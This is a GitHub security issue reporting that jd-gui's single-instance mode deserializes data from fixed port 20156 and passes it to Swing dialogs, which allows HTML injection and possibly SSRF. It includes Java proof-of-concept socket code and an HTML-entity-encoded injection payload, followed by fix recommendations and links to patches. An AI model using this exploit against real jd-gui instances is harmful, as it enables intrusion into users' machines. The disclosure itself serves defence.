### ISSUE TITLE
[Security]  Deserialize to Swing XSS

### ISSUE THREAD

**Issue by Y4tacker** [java-decompiler/jd-gui#416]
# Vulnerability Analysis
when somebody set `UIMainWindowPreferencesProvider.singleInstance` to true in `jd-gui.cfg` ，the InterProcessCommunicationUtil class will be called，
<img width="930" alt="image" src="https://user-images.githubusercontent.com/56486273/216633973-ca0cd514-075a-4bc0-869e-7adce19bf0ad.png">

let's check it，it opens a listener on fixed port 20156 (If the IP is exposed to the public network or is accessible between intranets, it may be affected when using jd-gui)to deserialize the incoming data and the deserialized data is then passed to the function `org.jd.gui.controller.MainController#openFiles` for processing
<img width="836" alt="image" src="https://user-images.githubusercontent.com/56486273/216634212-cbdf72bf-8434-449a-92d2-f4afd9aab8d3.png">
in `org.jd.gui.controller.MainController#openFiles`, if erros is not empty, it will calls `JOptionPane.showMessageDialog`
<img width="995" alt="image" src="https://user-images.githubusercontent.com/56486273/216635096-c19d1fb1-358c-402f-a3ad-9a4dce697dd4.png">
we knowthe jdgui tool is built with swing components，so if we can control the data we can insert some html code
let's test it
```java
String[] strings = {"no file<html>123</html>"};

ByteArrayOutputStream barr = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(barr);
oos.writeObject(strings);
oos.close();

try {
    Socket socket =new Socket("127.0.0.1",20156);

    BufferedOutputStream bufferedOutputStream = new BufferedOutputStream(socket.getOutputStream());
    bufferedOutputStream.write(barr.toByteArray());
    bufferedOutputStream.flush();

}catch (IOException e) {

    e.printStackTrace();

}
```
in this case,we found that the inserted html code was not rendered

<img width="698" alt="image" src="https://user-images.githubusercontent.com/56486273/216636835-e45c0ea1-6423-42e6-a89b-07fd91eeeeca.png">
After reading the code, we found that we need the html tags to be at the top of each line to work，so we can try to insert a line break 

&#x53;&#x74;&#x72;&#x69;&#x6E;&#x67;&#x5B;&#x5D;&#x20;&#x73;&#x74;&#x72;&#x69;&#x6E;&#x67;&#x73;&#x20;&#x3D;&#x20;&#x7B;&#x22;&#x2F;&#x5C;&#x6E;&#x5C;&#x6E;&#x5C;&#x6E;&#x5C;&#x6E;&#x3C;&#x68;&#x74;&#x6D;&#x6C;&#x3E;&#x3C;&#x62;&#x6F;&#x64;&#x79;&#x3E;&#x3C;&#x68;&#x31;&#x20;&#x63;&#x6F;&#x6C;&#x6F;&#x72;&#x3D;&#x27;&#x72;&#x65;&#x64;&#x27;&#x3E;&#x48;&#x61;&#x63;&#x6B;&#x65;&#x64;&#x20;&#x42;&#x79;&#x20;&#x59;&#x34;&#x74;&#x61;&#x63;&#x6B;&#x65;&#x72;&#x3C;&#x2F;&#x68;&#x31;&#x3E;&#x3C;&#x2F;&#x62;&#x6F;&#x64;&#x79;&#x3E;&#x3C;&#x2F;&#x68;&#x74;&#x6D;&#x6C;&#x3E;&#x22;&#x7D;&#x3B;
then，html tags are successfully rendered
<img width="742" alt="image" src="https://user-images.githubusercontent.com/56486273/216637251-6a2eff26-f095-4ac4-88b2-1a4e729ce5f5.png">
So since we can render any html tag, it stands to reason that we can work with the src attribute of the img tag to achieve ssrf

# Recommendations
in `org.jd.gui.controller.MainController#openFiles` 
<img width="951" alt="image" src="https://user-images.githubusercontent.com/56486273/216638130-0e0e8ea4-193b-4b4e-9531-7200132acb62.png">
The return value of file.getAbsolutePath() is made harmless by removing the newline(\n) character  or removing html tags from the return value

**Comment by 4ra1n** [comment]
https://github.com/java-decompiler/jd-gui/pull/417

**Comment by 4ra1n** [comment]
https://github.com/java-decompiler/jd-gui/pull/418
